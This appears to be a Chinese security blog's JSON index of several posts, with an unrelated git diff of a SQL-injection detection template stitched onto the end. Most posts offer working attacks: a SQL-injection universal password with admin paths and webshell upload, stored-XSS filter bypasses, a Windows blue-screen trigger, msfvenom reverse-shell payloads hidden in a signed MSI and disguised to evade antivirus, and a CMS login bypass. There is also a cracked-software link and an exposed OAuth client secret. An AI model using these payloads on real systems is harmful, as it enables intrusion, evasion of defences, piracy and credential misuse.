gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"锐捷RG-UAC","slug":"锐捷RG-UAC","date":"2021-03-09T10:47:53.000Z","updated":"2021-03-09T10:48:36.708Z","comments":true,"path":"2021/03/09/锐捷RG-UAC/","link":"","permalink":"http://bo.vuvhz.top/2021/03/09/%E9%94%90%E6%8D%B7RG-UAC/","excerpt":"","text":"#CNVD-2021-14536锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞 FOFA:title=\"RG-UAC登录页面\" && body=\"admin\" #检测#POC也没啥可POC的,ctrl+shift+i或者F12就是了接下来是欣赏马赛克的环节 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"驾校通网上约车系统漏洞分享","slug":"驾校通网系统漏洞","date":"2021-03-07T13:59:18.000Z","updated":"2021-03-07T14:09:50.860Z","comments":true,"path":"2021/03/07/驾校通网系统漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/%E9%A9%BE%E6%A0%A1%E9%80%9A%E7%BD%91%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#驾校通网上约车系统漏洞分享1039家校通网上约车系统是一款驾校一体化系统。北京壹零叁玖科技发展有限公司(简称1039公司)是国内第一家专业从事培训行业标准化软件开发和大型应用性平台的高科技企业,是培训行业信息化建设的最佳合作伙伴。 Google Hack: intitle: 1039家校通 ###漏洞利用###SQL注入万能密码影响版本: 家校通v1.0 - v.6.0 登录接口 /admin/Product/Comstye.aspx /Student/StudentLogin.aspx /Teacher/Index.aspx ###管理员 用户名密码均输入: ‘ or ‘’=’ (都是单引号)可直接进入。登陆后可任意修改网站内容 ###教练点评处存在SQL注入 /Teacher/TeacherPf.aspx?yid=0030 ###管理员后台增加分类处存在SQL注入# /admin/Product/comstye2.aspx /admin/yk/Index.aspx 配合SQL万能密码进入后台,然后访问:###后台管理编辑器任意文件上传上传文件 Burp抓包重放数据 模块,可以看到上传的地址; 访问路径 就是大马的地址WOW GETSHELL! var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2021-21972","slug":"CVE-2021-21972","date":"2021-03-07T13:56:13.000Z","updated":"2021-03-09T10:59:19.844Z","comments":true,"path":"2021/03/07/CVE-2021-21972/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/CVE-2021-21972/","excerpt":"","text":"#CVE-2021-21972 Vmware vCenter 图形化POC批量扫描工具#工具界面: (直接把.txt文件拖入进去就可以。。。)###下载地址:https://github.com/admin360bug/GUI-POC-EXP/####关于EXP:已编译完成,脱离python环境可用的工具 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"通达OAv11.7在线用户登录漏洞","slug":"通达OA登录漏洞","date":"2021-03-07T13:54:15.000Z","updated":"2021-03-09T10:41:18.732Z","comments":true,"path":"2021/03/07/通达OA登录漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#通达OA v11.7 在线用户登录漏洞###漏洞描述通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统###漏洞影响通达OA < v11.7 ###环境搭建https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe下载后按步骤安装即可###漏洞复现漏洞有关文件 MYOA\\webroot\\mobile\\auth_mobi.php","categories":[],"tags":[]},{"title":"Appscan_10.0.4破解版","slug":"Appscan-10-0-4破解版","date":"2021-03-07T13:47:41.000Z","updated":"2021-03-07T13:48:17.132Z","comments":true,"path":"2021/03/07/Appscan-10-0-4破解版/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/Appscan-10-0-4%E7%A0%B4%E8%A7%A3%E7%89%88/","excerpt":"","text":"#AppScan_10.0.4破解版 链接:链接:https://pan.baidu.com/s/1RarULLWDgijG3E1_KKMUBw提取码:53g8 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"foha批量查询脚本","slug":"foha","date":"2021-01-30T09:05:49.000Z","updated":"2021-03-07T13:32:23.371Z","comments":true,"path":"2021/01/30/foha/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/foha/","excerpt":"","text":"#分享一下fofa的批量查询脚本 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859#!/usr/bin/python3# -*- coding: utf-8 -*-# Author : 诚默import base64import jsonimport timeimport pandas as pdimport requestsfofa_mail = ''#通过fofa个人资料中获取fofa_key = ''#fofa_list = ['title', 'header', 'body', 'domain', 'icon_hash', 'host', 'port', 'ip', 'status_code', 'protocol', 'city', 'region', 'country', 'cert', 'banner', 'typ', 'os', 'server', 'app', 'after', 'asn', 'org', 'base_protocol', 'is_ipv6', 'is_domain', 'ip_ports', 'port_size', 'port_size_gt', 'port_size_lt', 'ip_country', 'ip_region', 'ip_city', 'ip_after', 'ip_before' ]def fofaapi(select): # 进行调用 page = 1 # 爬取几页数据,size为每页个数 size = 10 # 高级会员最大爬取前10000个 fields = "host,ip,port,title,country_name" # 返回的数据列 full = 'false' # 显示所有的数据,false显示当年的 base64_str = base64.b64encode(select.encode("utf-8")).decode('utf-8') api_url = 'https://fofa.so/api/v1/search/all?email=' + fofa_mail + '&key=' + fofa_key + '&qbase64=' + base64_str + '&fields=' + fields + '&size=' + str( size) + '&page=' + str(page) + '&full=' + full r = requests.get(api_url) # 提交请求 text = json.loads(r.text.encode('gbk', 'ignore').decode('gbk')) # 获得dict数据 print(text) # 后续为写入表 columns = fields.split(',') # 数据列名 excel_list = text['results'] excel_list.insert(0, ["查询语句:" + str(select) + " 页数:" + str(page) + " 每页:" + str(size)]) # 写入初始的查询语句 dt = pd.DataFrame(excel_list, columns=columns) file = 'fofa' + time.strftime('%Y%m%d%H%M%S', time.localtime(time.time())) # 文件名为fofa+时间 dt.to_excel(file + ".xlsx", index=1, engine='xlsxwriter') #return textdef getselect(str):#格式化 select = "" comma_list = str.split(',') # 以逗号分组 (ip=1.1.1.1 | domain=baidu.com) for item in comma_list: equal_list = item.split('=') # 等号分组 ip | 1.1.1.1 if equal_list[0] in fofa_list: # 属性存在,等号合规 select += item + " && " else: return False return select.rstrip(' && ') # 去除多余符号def main(): str = "domain=baidu.com" str1 = "ip=61.135.186.217,domain=baidu.com" if getselect(str1) != False: # 进行数据处理,数据合规就进行下一步操作 fofaapi(getselect(str1))if __name__ == '__main__': main() 文件结果如下,可根据需求改动 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"存储xss挖掘经验","slug":"xss","date":"2021-01-30T08:58:23.000Z","updated":"2021-03-07T13:33:01.475Z","comments":true,"path":"2021/01/30/xss/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/xss/","excerpt":"","text":"#存储xss挖掘经验 结合这几天挖掘的src xss稍微总结一下存储xss的挖掘经验 出现位置#一般都是有框就X 例如站内信功能 评论功能等个人喜欢先填写一个<img src=1>看看解析不解析img标签 或者实体编码 进行判断xss的存在,有些厂商一般不会ban img a这种标签,只会ban alert,或者onclick,onload,onerror这种事件属性, 有些地方会进行一个前台校验输入是否合法 但是后端没有进行判断,例如下图 我们就可以在前台输入一个正常的数据例如aaa都可以 然后抓包修改 就可以进行绕过 或者还有一些地方有输入长度限制,可以f12修改一下maxlength看看输入payload之后提交后能不能正常的进行保存 如果能进行保存成功的话那就又是前端校验 或者通过事件进行缩短payload #payload的绕过 https://www.cnblogs.com/H4ck3R-XiX/p/12732356.html 我觉得这篇文章是一篇不错的总结 如果输入一个很明显是有害的payload如:<script>alert('xss')</script 之类的可能会将script alert这类危险字符进行一个分割或者加点之类的 这里script被分割 无法触发payload 这里用点进行了分割 这时候我们可以进行一个编码绕过 例如<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;/xss/&#41;>aaaa 至于编码绕过上面这篇文章已经总结的很详细了。 #如何触发payload?耐心很重要,例如上面的一个例子 我将自己的姓名修改为xss payload发现并没有解析 差点让我痛失一个中危- - 后面我发现这个站有评论功能 我奇怪的发现当我随便评论一个东西的时候 他解析了img标签 也就是说评论时是带姓名来评论的 而这里又没有任何的过滤 可以说是形成了一个二次xss吧 接下就只需要将payload替换成弹窗或者引入外部js什么的 就能直接起飞了 因为这个位置没有任何的过滤 还有一种常见的就是厂商在前台进行了校验 而忽略了后台的校验 例如 我一般喜欢用两个账号测试xss 一个账号发布 然后另一个账号测试 在评论处输入payload是没什么反应的 但是当我进入发布者的后台时候发现弹窗了这样一个存储xss也就到手了 总之就是多去测试 尽量寻找可能触发payload的地方 遇到实体编码的地方就可以去寻找其他一些可能触发payload的位置 [转] var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"win10蓝屏bug","slug":"win10蓝屏bug","date":"2021-01-30T08:14:21.000Z","updated":"2021-03-07T13:32:42.879Z","comments":true,"path":"2021/01/30/win10蓝屏bug/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/win10%E8%93%9D%E5%B1%8Fbug/","excerpt":"","text":"#win10蓝屏bug最近win10 的蓝屏bug最近很火,在google浏览器中输入: \\\\.\\globalroot\\device\\condrv\\kernelconnect 就会蓝屏,亲测有效; 看到吾爱中分析解释说是condrv驱动里的派遣函数CdpDispatchCleanup发生了空指针引用,而后触发了蓝屏。 因为谷歌浏览器调用了GetFileAttributesExW函数,然后转入ntdll,接着走进了内核,然后调用了condrv的派遣函数。 12345678<html><head></head><body>><script>document.location = '\\\\\\\\.\\\\globalroot\\\\device\\\\condrv\\\\kernelconnect';</script></body></html> 有师傅分享了代码: 12345678910/ BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。//#include <iostream>#include <Windows.h>int main(){ WCHAR fileName[] = L"\\\\\\\\.\\\\globalroot\\\\device\\\\condrv\\\\kernelconnect"; WIN32_FILE_ATTRIBUTE_DATA data; GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);} 直接编译成exe文件: 运行生成的exe文件,成功蓝屏:好像没看到可以利用此漏洞来远程执行代码的,希望win10早点修复这个bug呗。 参考链接:https://www.52pojie.cn/thread-1354077-1-1.html var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2020-1380签名伪造","slug":"CVE-2020-1380签名伪造","date":"2020-11-17T10:17:01.000Z","updated":"2021-03-07T13:32:07.379Z","comments":true,"path":"2020/11/17/CVE-2020-1380签名伪造/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/CVE-2020-1380%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0/","excerpt":"","text":"#CVE-2020-1380签名伪造在之前的文章中,冷逸曾写过一篇《使用CVE-2020-0601进行伪造签名》的文章,里面利用windows其对椭圆曲线的逻辑处理错误,可以为任何程序添加可信的数字签名。而今天介绍的是冷逸另一种更加简单的方法,来添加数字签名,漏洞编号为CVE-2020-1380也称之为GlueBall。利用该漏洞可绕过安全特征,不正确地加载已签名文件。在攻击场景中,攻击者能够绕过旨在阻止加载不正确签名文件的安全特征。我们来看一下这个漏洞,众所周知,在以管理员权限运行时,windows会弹出uac的提示,而拥有数字签名的程序触发uac时,为蓝色. 非数字签名的为黄色 而众所周知比较常用的数字签名伪造工具sigthief是可以进行签名伪造的,该工具伪造的签名在国内的一些在线测试平台上会显示签名正常,而在VT则会显示无效签名,在系统中也会显示签名无效. 而利用该漏洞签名的文件,则会显示正常. 注:VT已针对该漏洞进行更新,VT可成功检测该漏洞攻击,会显示invaild-signature 下面即对该漏洞进行复现,该漏洞的复现过程很简单,准备一个带有数字签名的msi文件,一个恶意的jar文件(可msf生成),然后合成即可,思路如下. msfvenom -p java/meterpreter/reverse_https LHOST= LPORT= -f jar -o xxx.jar 然后制作文件 copy /b xxx.msi + xxx.jar xxx.jar 成功获取session。其余java编写文件都可以使用该方法进行制作,注:只能为java文件 导致该漏洞的原因为当 Windows 读取 MSI 文件时,它会从文件开头开始读取,一直到有效的 MSI 签名末尾结束并舍弃其它部分。因此在检测到合法的 MSI 文件结构后,它会忽略被附加的数据,而不管它是什么。而JAR 文件只不过是 ZIP 文件,并且在执行时由 Java 运行时从文件末尾开始读取,直到检测到有效 ZIP 文件结构的开头为止,然后它将丢弃文件的其余部分。这最后将造成indows 开始从开头读取而 JAVA 从末尾读取时,windows认为其是一个签名文件,而java文件也可以正常运行。 现windows已更新了相关补丁,主要为msisip.dll该文件,加入了NeedFileSizeVerification和VerifyFileSize两个逻辑,更新系统即可防止该类攻击。 参考文章:https://blog.csdn.net/smellycat000/article/details/108091187https://www.secrss.com/articles/24763https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/https://www.chainnews.com/zh-hant/articles/041869869233.htmhttps://wwws.nightwatchcybersecurity.com/2019/01/16/thoughts-on-the-msi-jar-authenticode-bypass/ var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"httpsms","slug":"httpsms","date":"2020-11-17T10:00:38.000Z","updated":"2021-03-07T13:32:33.655Z","comments":true,"path":"2020/11/17/httpsms/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/httpsms/","excerpt":"","text":"#https证书绕过杀软msf生成证书(要能连上google,用俺vps来搞)use auxiliary/gather/impersonate_ssl set RHOST www.google.com run生成msf攻击载荷:msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.226.136 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=/root/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f py -o pentestlab.py然后msf监听: use exploit/multi/handler set payload windows/meterpreter/reverse_winhttps set LHOST 192.168.226.136 set LPORT 443 set HandlerSSLCert /root/www.google.com.pem (设置证书) set StagerVerifySSLCert true exploit -j 然后在win7上运行这个pentestlab.py 360杀毒,安全卫士无反应。 全自动工具:https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL 参考:https://pentestlab.blog/category/defense-evasion/ var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"cms","slug":"cms漏洞","date":"2020-11-17T09:36:28.000Z","updated":"2021-03-07T13:31:53.691Z","comments":true,"path":"2020/11/17/cms漏洞/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/cms%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#cms后台登录绕过@miko 1.随便打开一个index.php,然后发送post请求,创建seions.POST:_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999此时就成功地创建了SESION变量.2.创建完成后,登录后台.3.成功! var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"about","slug":"about","date":"2020-11-17T09:27:45.000Z","updated":"2021-03-07T13:31:45.419Z","comments":true,"path":"2020/11/17/about/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/about/","excerpt":"","text":"#I’m miko魔域魂窟是我的github博客. 你可以在这里学到东西. var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]}],"categories":[],"tags":[]} \ No newline at end of file diff --git a/json/fahuo100_sql_injection_CNVD_2021_30193.json b/json/fahuo100_sql_injection_CNVD_2021_30193.json index cd9bc54..a5b837e 100644 --- a/json/fahuo100_sql_injection_CNVD_2021_30193.json +++ b/json/fahuo100_sql_injection_CNVD_2021_30193.json @@ -1,19 +1,25 @@ { - "Name": "fahuo100_sql_injection_CNVD_2021_30193", - "Level": "3", + "Name": "Fahuo100 SQL Injection CNVD-2021-30193", + "Level": "2", "Tags": [ "SQL Injection" ], "GobyQuery": "header=\"Cache-Control: no-store, no-cache\"", - "Description": "发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息", - "Product": "发货100", + "Description": "Fahuo100 virtual goods automatic delivery system is a powerful virtual goods automatic delivery system/article paid reading system.", + "Product": "Fahuo100", "Homepage": "https://www.fahuo100.cn/", - "Author": "gobysec@gmail.com", - "Impact": "", - "Recommandation": "

undefined

", + "Author": "", + "Impact": "Fahuo100 M_id SQL Injection", + "Recommendation": "", "References": [ - "https://gobies.org/" + "https://www.cnvd.org.cn/flaw/show/CNVD-2021-30193" ], + "HasExp": false, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +27,7 @@ "method": "GET", "uri": "/?M_id=1'&type=product", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -48,6 +54,6 @@ "SetVariable": [] } ], - "PostTime": "2021-06-03 22:27:28", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file